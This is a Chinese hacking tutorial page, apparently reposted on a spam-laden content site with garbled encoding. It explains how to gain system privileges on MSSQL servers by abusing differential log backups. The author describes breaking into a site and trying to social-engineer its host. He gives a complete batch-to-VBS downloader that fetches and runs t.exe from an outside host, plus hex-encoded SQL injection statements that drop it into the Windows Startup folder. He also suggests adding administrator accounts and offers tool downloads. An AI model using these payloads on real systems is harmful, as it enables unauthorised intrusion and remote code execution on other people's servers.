久久久999,激情无码亚洲一区二区三区,国产1000部成人免费视频

主頁(yè) > 知識(shí)庫(kù) > MSSQL差異備份取系統(tǒng)權(quán)限的相關(guān)軟件下載

MSSQL差異備份取系統(tǒng)權(quán)限的相關(guān)軟件下載

昨天在網(wǎng)上找資料的時(shí)間無(wú)意進(jìn)了一個(gè)站，糊里糊涂就進(jìn)去了，想提權(quán)提不起來(lái)，后來(lái)加上服務(wù)商的Q號(hào)想社工一下，射了半天得知服務(wù)器的安全是綠盟的人給做的安全，后來(lái)就問(wèn)豬豬有什么提權(quán)的方法沒(méi)，他剛好做了這個(gè)動(dòng)畫(huà)就給發(fā)來(lái)過(guò)來(lái)，在網(wǎng)上查了一下找到了文章，一起拷貝過(guò)來(lái).最近忙著學(xué)習(xí)很少關(guān)注這方面的東西，落后了，落后了......

下面是是在網(wǎng)上找到的資料和動(dòng)畫(huà).

TEAM里的內(nèi)部資料放久了,現(xiàn)在不放出來(lái),遲早會(huì)有人發(fā)掘出來(lái)的！既然如此就拿出來(lái)大家分享吧！
MSSQL差異備份獲取webshell 幾乎人人皆知,那么我們可以利用差異備份出來(lái)的文件當(dāng)作惡意代碼
讓系統(tǒng)執(zhí)行了之后自動(dòng)提升權(quán)限或者添加管理員嗎？答案當(dāng)然可以了,kj021320測(cè)試了N次之后跟你說(shuō)！

那么我們得考慮文件擺放的位置~什么地方系統(tǒng)會(huì)運(yùn)行呢？這個(gè)其實(shí)算是廢話吧！
大家不用想都知道通用地方 C:\Documents and Settings\All Users\「開(kāi)始」菜單\程序\啟動(dòng)
呵呵位置有了！　那么我們備份什么文件讓系統(tǒng)能執(zhí)行的呢？
這個(gè)是第一個(gè)關(guān)鍵點(diǎn)~！
EXE  JS  VBS  BAT這些文件大家第一時(shí)間想到的了
那些我一個(gè)一個(gè)來(lái)分析 exe的話！絕對(duì)能了！但是 MSSQL差異備份這么多垃圾肯定會(huì)把exe弄壞的！
否決掉
然后到腳本
VBS 我們能不能把他的垃圾信息注釋掉呢？不然VBS 會(huì)執(zhí)行不了！ OK 學(xué)過(guò)VBS的朋友都知道
VBS里面有2種注釋 '  還有就是 rem
但是還是會(huì)有垃圾信息屏蔽不了
否決掉

JS呢？ JS里面有多行注釋的/**/  但是 /* 不可能在首行吧？
否決掉

最后剩下我們最熟悉的bat批處理了！
OK我們繼續(xù)分析 bat里面注釋是什么呢？也是REM,失敗??！之前vbs那里不行這里的rem注釋也一樣不行的！
那么我們?cè)趺崔k呢？其實(shí)很簡(jiǎn)單！當(dāng)我們?cè)贑MD下面敲錯(cuò)了命令系統(tǒng)會(huì)怎樣呢？

說(shuō)到這里要是大家不往文章下面看也一樣能想到方法了吧~

OK我們繼續(xù)探~~這里是最最關(guān)鍵點(diǎn),差異備份出來(lái)的垃圾信息我們可以通過(guò)用回車(chē)把他提交了！
而系統(tǒng)只當(dāng)作無(wú)用的命令來(lái)處理！不影響我們的操作！
問(wèn)題就這樣解決了嗎？不是的！~MSSQL備份的時(shí)候,到一定的字符長(zhǎng)度就會(huì)出現(xiàn)垃圾的字符,那個(gè)字符會(huì)影響我們的操作！
那么我們得把語(yǔ)句盡量縮少,越少越好~
OK那我們思路好了就采用bat 寫(xiě)一個(gè)VBS的下載者然后執(zhí)行這個(gè)下載者最后通過(guò)下載者down回來(lái)的馬子來(lái)獲取系統(tǒng)權(quán)限
下面是我改過(guò)的生成下載者的BAT

echo Set P=createObject("Microsoft.XMLHTTP")>k.vbs
echo P.Open "GET","http://www.isto.cn/t.exe",0 >>k.vbs
echo P.Send():set G=createObject("ADODB.Stream")>>k.vbs
echo G.Mode=3:G.Type=1:G.Open() >>k.vbs
echo G.Write P.ResponseBody:G.SaveToFile "t.exe",2 >>k.vbs
k.vbs
t

下一個(gè)k.VBS然后k.vbs下載一個(gè)t.exe文件保存到本地直接執(zhí)行
記得記得我說(shuō)過(guò)的代碼前面一定要用回車(chē)把垃圾數(shù)據(jù)提交最好2以上個(gè)回車(chē)
然后實(shí)現(xiàn)差異備份

alter database ISTO set RECOVERY FULL--
create table cmd (a image)--
backup log ISTO to disk = 'c:\cmd1' with init--
insert into cmd (a) values (0x130A0D0A6563686F2053657420503D6372656174654F626A65637428224D696372

6F736F66742E584D4C4854545022293E6B2E7662730D0A6563686F20502E4F70656E2

022474554222C22687474703A2F2F7777772E6973746F2E636E2F742E657865222C30

203E3E6B2E7662730D0A6563686F20502E53656E6428293A73657420473D63726561

74654F626A656374282241444F44422E53747265616D22293E3E6B2E7662730D0A65

63686F20472E4D6F64653D333A472E547970653D313A472E4F70656E2829203E3E6B

2E76627320200D0A6563686F20472E577269746520502E526573706F6E7365426F64

793A472E53617665546F46696C652022742E657865222C32203E3E6B2E7662730D0A

6B2E7662730D0A740D0A)--
backup log ISTO to disk = 'C:\Documents and Settings\All Users\「開(kāi)始」菜單\程序\啟動(dòng)\1.bat'--
drop table cmd--

OK bat出來(lái)了！至于怎樣讓服務(wù)器重啟呢！這個(gè)問(wèn)題遺留給你們?nèi)ビ懻摪桑?
要是服務(wù)器直接開(kāi)啟了3389 那就更方便了！直接bat 一個(gè)添加管理員的命令更爽！

isto是動(dòng)畫(huà)里用到的工具.
isto輔助轉(zhuǎn)換工具.rar
mssql差異備份取系統(tǒng)權(quán)限.rar

您可能感興趣的文章:

C#實(shí)現(xiàn)MySQL命令行備份和恢復(fù)
C#實(shí)現(xiàn)的SQL備份與還原功能示例
c#使用file.copy實(shí)現(xiàn)文件備份示例
Python 實(shí)現(xiàn)文件的全備份和差異備份詳解
Python實(shí)現(xiàn)網(wǎng)站文件的全備份和差異備份
sqlserver 手工實(shí)現(xiàn)差異備份的步驟
提權(quán)思路之MSSQL差異備份取系統(tǒng)權(quán)限
復(fù)習(xí)一下sql server的差異備份
C#寫(xiě)差異文件備份工具的示例

標(biāo)簽：來(lái)賓營(yíng)口無(wú)錫寶雞七臺(tái)河西寧邯鄲汕尾

巨人網(wǎng)絡(luò)通訊聲明：本文標(biāo)題《MSSQL差異備份取系統(tǒng)權(quán)限的相關(guān)軟件下載》，本文關(guān)鍵詞 MSSQL,差異,備份,取,系統(tǒng),；如發(fā)現(xiàn)本文內(nèi)容存在版權(quán)問(wèn)題，煩請(qǐng)?zhí)峁┫嚓P(guān)信息告之我們，我們將及時(shí)溝通與處理。本站內(nèi)容系統(tǒng)采集于網(wǎng)絡(luò)，涉及言論、版權(quán)與本站無(wú)關(guān)。